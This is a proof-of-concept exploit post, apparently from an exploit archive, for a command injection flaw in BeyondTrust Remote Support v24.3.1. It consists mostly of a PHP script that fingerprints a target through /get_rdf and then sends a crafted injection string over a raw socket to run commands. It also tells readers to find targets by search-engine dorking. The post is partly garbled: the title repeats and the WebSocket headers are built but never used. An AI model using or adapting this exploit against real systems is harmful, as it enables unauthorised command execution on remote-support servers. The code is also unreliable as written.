=============================================================================================================================================
| # Title : BeyondTrust v24.3.1 =============================================================================================================================================
| # Title : BeyondTrust v24.3.1 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.beyondtrust.com |
=============================================================================================================================================
POC :
[+] Dorking ?n Google Or Other Search Enggine.
[+] The code exploits a vulnerability in BeyondTrust Remote Support via WebSocket to execute arbitrary commands on the target system.
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php <URL>
[+] SeT target = Line 72
[+] PayLoad :
<?php
class BeyondTrustExploit {
private $target;
private $port;
private $use_ssl;
private $payload;
public function __construct($target, $port = 443, $use_ssl = true) {
$this->target = $target;
$this->port = $port;
$this->use_ssl = $use_ssl;
$this->payload = "echo 'Hacked';"; // ????? ??????? ??? ??????
}
private function send_request($path, $params = []) {
$protocol = $this->use_ssl ? 'https' : 'http';
$url = "$protocol://{$this->target}:{$this->port}$path";
$query_string = http_build_query($params);
$full_url = !empty($query_string) ? "$url?$query_string" : $url;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $full_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
public function check_vulnerability() {
$response = $this->send_request('/get_rdf', ['comp' => 'sdcust', 'locale_code' => 'en-us']);
if (!$response) {
return "No Target";
}
if (strpos($response, 'Thank you for using BeyondTrust') !== false) {
return "OHH OK";
}
return "no";
}
public function exploit() {
$ws_url = ($this->use_ssl ? 'wss' : 'ws') . "://{$this->target}:{$this->port}/nw";
$headers = [
"Sec-WebSocket-Protocol: ingredi support desk customer thin",
"X-Ns-Company: TargetCompany",
"Host: {$this->target}"
];
$wsock = fsockopen($this->target, $this->port, $errno, $errstr, 10);
if (!$wsock) {
return " WebSocket";
}
fwrite($wsock, "1\n");
fwrite($wsock, uniqid() . "\n");
fwrite($wsock, "0\n");
fwrite($wsock, "\xC0'; \! {$this->payload} #\n");
fclose($wsock);
return "payload";
}
}
$exploit = new BeyondTrustExploit('127.0.0.1');
echo $exploit->check_vulnerability();
echo "\n";
echo $exploit->exploit();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================